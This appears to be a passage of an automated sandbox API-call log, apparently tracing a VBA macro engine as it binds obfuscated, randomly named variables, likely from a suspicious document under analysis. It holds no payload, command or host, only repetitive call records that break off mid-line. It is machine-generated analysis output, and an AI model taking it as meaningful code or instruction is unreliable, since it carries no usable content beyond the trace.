ITypeComp:RemoteBind (in: This=0x665bd30, szName="EkA41A", lHashVal=0x101c7c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.055] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="EkA41A") returned 0x101c7c [0070.055] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="EkA41A" | out: _Dst="EkA41A") returned 0x0 [0070.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="EkA41A") returned 7 [0070.055] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="EkA41A", lHashVal=0x101c7c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.055] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d20 [0070.055] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x7, _Src=0x3cb2b2a | out: _Dst=0x67c2d20) returned 0x0 [0070.055] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_EkA41A" | out: _Dst="_B_var_EkA41A") returned 0x0 [0070.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_EkA41A") returned 14 [0070.056] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_EkA41A", lHashVal=0x109725, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x45005f00720061, ppTypeComp=0x31003400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x45005f00720061, ppTypeComp=0x31003400000000, pDummy=0x0) returned 0x0 [0070.056] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3cb2b2a | out: _Dst=0x144ec0) returned 0x0 [0070.056] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d20) returned 0x0 [0070.056] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d20) returned 0x0 [0070.056] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d20) returned 0x0 [0070.056] ITypeComp:RemoteBind (in: This=0x665ba60, szName="s1AA_CZc", lHashVal=0x10cd23, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.056] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2a82, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="s1AA_CZc") returned 9 [0070.056] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="s1AA_CZc", lHashVal=0x10cd23, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.056] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2a82, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="s1AA_CZc") returned 9 [0070.056] ITypeComp:RemoteBind (in: This=0x665bd30, szName="s1AA_CZc", lHashVal=0x10cd23, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.056] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="s1AA_CZc") returned 0x10cd23 [0070.056] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="s1AA_CZc" | out: _Dst="s1AA_CZc") returned 0x0 [0070.056] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="s1AA_CZc") returned 9 [0070.057] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="s1AA_CZc", lHashVal=0x10cd23, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.057] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d20 [0070.057] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x9, _Src=0x3cb2a82 | out: _Dst=0x67c2d20) returned 0x0 [0070.057] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_s1AA_CZc" | out: _Dst="_B_var_s1AA_CZc") returned 0x0 [0070.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_s1AA_CZc") returned 16 [0070.057] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_s1AA_CZc", lHashVal=0x10a4ac, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x73005f00720061, ppTypeComp=0x5f004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x73005f00720061, ppTypeComp=0x5f004100000000, pDummy=0x0) returned 0x0 [0070.057] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3cb2a82 | out: _Dst=0x144ec0) returned 0x0 [0070.057] ITypeComp:RemoteBind (in: This=0x665ba60, szName="jXXADAQ", lHashVal=0x10efd6, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2b7e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="jXXADAQ") returned 8 [0070.057] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="jXXADAQ", lHashVal=0x10efd6, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2b7e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="jXXADAQ") returned 8 [0070.057] ITypeComp:RemoteBind (in: This=0x665bd30, szName="jXXADAQ", lHashVal=0x10efd6, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.057] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jXXADAQ") returned 0x10efd6 [0070.057] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="jXXADAQ" | out: _Dst="jXXADAQ") returned 0x0 [0070.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="jXXADAQ") returned 8 [0070.058] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="jXXADAQ", lHashVal=0x10efd6, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.058] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d20 [0070.058] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x8, _Src=0x3cb2b7e | out: _Dst=0x67c2d20) returned 0x0 [0070.058] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_jXXADAQ" | out: _Dst="_B_var_jXXADAQ") returned 0x0 [0070.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_jXXADAQ") returned 15 [0070.058] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_jXXADAQ", lHashVal=0x10f35a, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6a005f00720061, ppTypeComp=0x44004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6a005f00720061, ppTypeComp=0x44004100000000, pDummy=0x0) returned 0x0 [0070.058] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3cb2b7e | out: _Dst=0x144ec0) returned 0x0 [0070.058] ITypeComp:RemoteBind (in: This=0x665ba60, szName="BoBA4ACA", lHashVal=0x10ffdf, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2b52, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="BoBA4ACA") returned 9 [0070.058] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="BoBA4ACA", lHashVal=0x10ffdf, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2b52, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="BoBA4ACA") returned 9 [0070.058] ITypeComp:RemoteBind (in: This=0x665bd30, szName="BoBA4ACA", lHashVal=0x10ffdf, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.058] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BoBA4ACA") returned 0x10ffdf [0070.058] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="BoBA4ACA" | out: _Dst="BoBA4ACA") returned 0x0 [0070.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="BoBA4ACA") returned 9 [0070.058] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="BoBA4ACA", lHashVal=0x10ffdf, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.059] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d20 [0070.059] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x9, _Src=0x3cb2b52 | out: _Dst=0x67c2d20) returned 0x0 [0070.059] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_BoBA4ACA" | out: _Dst="_B_var_BoBA4ACA") returned 0x0 [0070.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_BoBA4ACA") returned 16 [0070.059] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_BoBA4ACA", lHashVal=0x10c7e7, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x42005f00720061, ppTypeComp=0x34004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x42005f00720061, ppTypeComp=0x34004100000000, pDummy=0x0) returned 0x0 [0070.059] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3cb2b52 | out: _Dst=0x144ec0) returned 0x0 [0070.059] ITypeComp:RemoteBind (in: This=0x665ba60, szName="ODAC_DX", lHashVal=0x10610d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2ba6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="ODAC_DX") returned 8 [0070.059] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="ODAC_DX", lHashVal=0x10610d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2ba6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="ODAC_DX") returned 8 [0070.059] ITypeComp:RemoteBind (in: This=0x665bd30, szName="ODAC_DX", lHashVal=0x10610d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.059] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ODAC_DX") returned 0x10610d [0070.059] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="ODAC_DX" | out: _Dst="ODAC_DX") returned 0x0 [0070.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="ODAC_DX") returned 8 [0070.059] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="ODAC_DX", lHashVal=0x10610d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.059] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d20 [0070.059] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x8, _Src=0x3cb2ba6 | out: _Dst=0x67c2d20) returned 0x0 [0070.060] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_ODAC_DX" | out: _Dst="_B_var_ODAC_DX") returned 0x0 [0070.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_ODAC_DX") returned 15 [0070.060] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_ODAC_DX", lHashVal=0x106491, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4f005f00720061, ppTypeComp=0x5f004300000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4f005f00720061, ppTypeComp=0x5f004300000000, pDummy=0x0) returned 0x0 [0070.060] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3cb2ba6 | out: _Dst=0x144ec0) returned 0x0 [0070.060] ITypeComp:RemoteBind (in: This=0x665ba60, szName="wZxAU11", lHashVal=0x106304, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2bce, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="wZxAU11") returned 8 [0070.060] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="wZxAU11", lHashVal=0x106304, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2bce, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="wZxAU11") returned 8 [0070.060] ITypeComp:RemoteBind (in: This=0x665bd30, szName="wZxAU11", lHashVal=0x106304, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.060] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wZxAU11") returned 0x106304 [0070.060] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="wZxAU11" | out: _Dst="wZxAU11") returned 0x0 [0070.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="wZxAU11") returned 8 [0070.060] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="wZxAU11", lHashVal=0x106304, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.060] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d20 [0070.060] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x8, _Src=0x3cb2bce | out: _Dst=0x67c2d20) returned 0x0 [0070.060] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_wZxAU11" | out: _Dst="_B_var_wZxAU11") returned 0x0 [0070.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_wZxAU11") returned 15 [0070.061] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_wZxAU11", lHashVal=0x105707, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x55004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x55004100000000, pDummy=0x0) returned 0x0 [0070.061] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3cb2bce | out: _Dst=0x144ec0) returned 0x0 [0070.061] ITypeComp:RemoteBind (in: This=0x665ba60, szName="OBBAwC", lHashVal=0x10eedc, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.061] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2c1e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="OBBAwC") returned 7 [0070.061] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="OBBAwC", lHashVal=0x10eedc, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.061] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2c1e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="OBBAwC") returned 7 [0070.061] ITypeComp:RemoteBind (in: This=0x665bd30, szName="OBBAwC", lHashVal=0x10eedc, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.061] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OBBAwC") returned 0x10eedc [0070.061] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="OBBAwC" | out: _Dst="OBBAwC") returned 0x0 [0070.061] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="OBBAwC") returned 7 [0070.061] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="OBBAwC", lHashVal=0x10eedc, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.061] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d20 [0070.061] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x7, _Src=0x3cb2c1e | out: _Dst=0x67c2d20) returned 0x0 [0070.061] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_OBBAwC" | out: _Dst="_B_var_OBBAwC") returned 0x0 [0070.061] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_OBBAwC") returned 14 [0070.061] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3cb2c1e | out: _Dst=0x144ec0) returned 0x0 [0070.062] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="OAAAQA" | out: _Dst="OAAAQA") returned 0x0 [0070.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="OAAAQA") returned 7 [0070.062] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x7, _Src=0x3cb2bf6 | out: _Dst=0x67c2d20) returned 0x0 [0070.062] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_OAAAQA" | out: _Dst="_B_var_OAAAQA") returned 0x0 [0070.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_OAAAQA") returned 14 [0070.062] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3cb2bf6 | out: _Dst=0x144ec0) returned 0x0 [0070.062] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="SwkAZo" | out: _Dst="SwkAZo") returned 0x0 [0070.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="SwkAZo") returned 7 [0070.062] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x7, _Src=0x3cb2c6e | out: _Dst=0x67c2d20) returned 0x0 [0070.062] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_SwkAZo" | out: _Dst="_B_var_SwkAZo") returned 0x0 [0070.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_SwkAZo") returned 14 [0070.062] _mbscpy_s (in: 